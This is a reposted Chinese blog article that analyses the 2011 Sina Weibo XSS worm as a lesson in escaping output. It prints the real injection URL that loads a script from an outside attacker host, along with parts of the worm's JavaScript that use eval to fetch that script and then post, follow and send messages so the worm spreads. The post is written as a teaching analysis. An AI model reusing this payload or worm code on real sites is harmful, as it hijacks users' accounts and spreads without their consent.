开发者社区> 技术mix呢> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

XSS-从weibo蠕虫事件学习

简介:
+关注继续查看

XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。

 

Xss的例子(以新浪微博的6.9的hellosamy蠕虫事件为例):

 

sina的名人堂页面页面上存在这么个链接

<a href="http://weibo.com/pub/star/g/123">这个是xss</a>

 

其实在服务器端是这么写的(猜测,真实代码长啥样不知道,但是一定是忘记做转义就输出了):

Echo '<a href="http://weibo.com/pub/star/g/{$uname}">这个是xss</a>'

 

其中uname并没有做htmlspecialchars。相当于是直接由用户输入,然后输出在页面上了。

这样的html就是存在xss漏洞

 

好了,这个漏洞被发现了,下面要利用它做什么呢?

1 将uname设置成xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

这样这个url就变成了

clip_image001

其中的引号被封闭了,然后这个页面自动运行了一段js脚本

 

这个js脚本做了这样的事情:

1 发送一个微博(这个是之所以成为蠕虫的原因,这个微博中附带着同样的一个连接)

2 加关注uid为2201270010

3 发私信,向好友传播链接

 

js的下载代码在http://www.stwind.org/wp-content/uploads/2011/06/06.28_sina_XSS.txt.zip

 

1
2
3
4
5
6
7
8
9
10
11
try{
 
x="g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";window.opener.eval(x);
 
}
 
catch(e){}
 
main();
 
var t=setTimeout('location="http://weibo.com/pub/topic";',5000);

 

其中就是在打开的页面加入了<script节点>,并执行

main中是发送微博,加关注,发私信三个动作

当5000秒后,当前页重新定位到public/topic上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
function main(){
 
try{
 
publish();
 
}
 
catch(e){}
 
try{
 
follow();
 
}
 
catch(e){}
 
try{
 
message();
 
}
 
catch(e){}
 
}
比如

 

1
2
3
4
5
6
7
8
9
function publish(){
 
url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();
 
data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
 
post(url,data,true);
 
}

模拟post请求,由于这个js是在weibo网页上调用的,所以就没有跨域问题

 

直接post就可以产生这个效果

 

注:这次事件中还用到了短链接服务

短链接服务能自定义用户链接,比如http://weibo.com/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

这么长一个链接能变为http://t.cn/atmcqn

这样能增加用户的点击成功率

 

事实证明,建站是需要非常小心的,每个页面,每个输出,如果有一两个漏洞,都可能造成全站的大灾难!!引以为戒!

 

本文转自轩脉刃博客园博客,原文链接:http://www.cnblogs.com/yjf512/archive/2012/03/08/2385093.html,如需转载请自行联系原作者


版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
网络安全——xss漏洞之最全事件函数汇总
还在为xss漏洞找不到而发愁?看看这篇最全xss攻击函数汇总在说
0 0
Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)
上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 `XSS Payload` 以及从攻击者的角度来初探 XSS 攻击的威力。
2541 0
一种绕过 CSP 在 Twitter 子站中执行 XSS 的攻击
本文讲的是一种绕过 CSP 在 Twitter 子站中执行 XSS 的攻击,现在就开始讲述发现这一漏洞的过程,首先我对twitter进行了子域名收集,发现了https://careers.twitter.com这一网站,你可以在这一网站上向twitter投简历,找工作,不过我在这个网站寻找漏洞~
1045 0
Magicodes.WeiChat——使用AntiXssAttribute阻止XSS(跨站脚本攻击)攻击
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。
639 0
+关注
文章
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载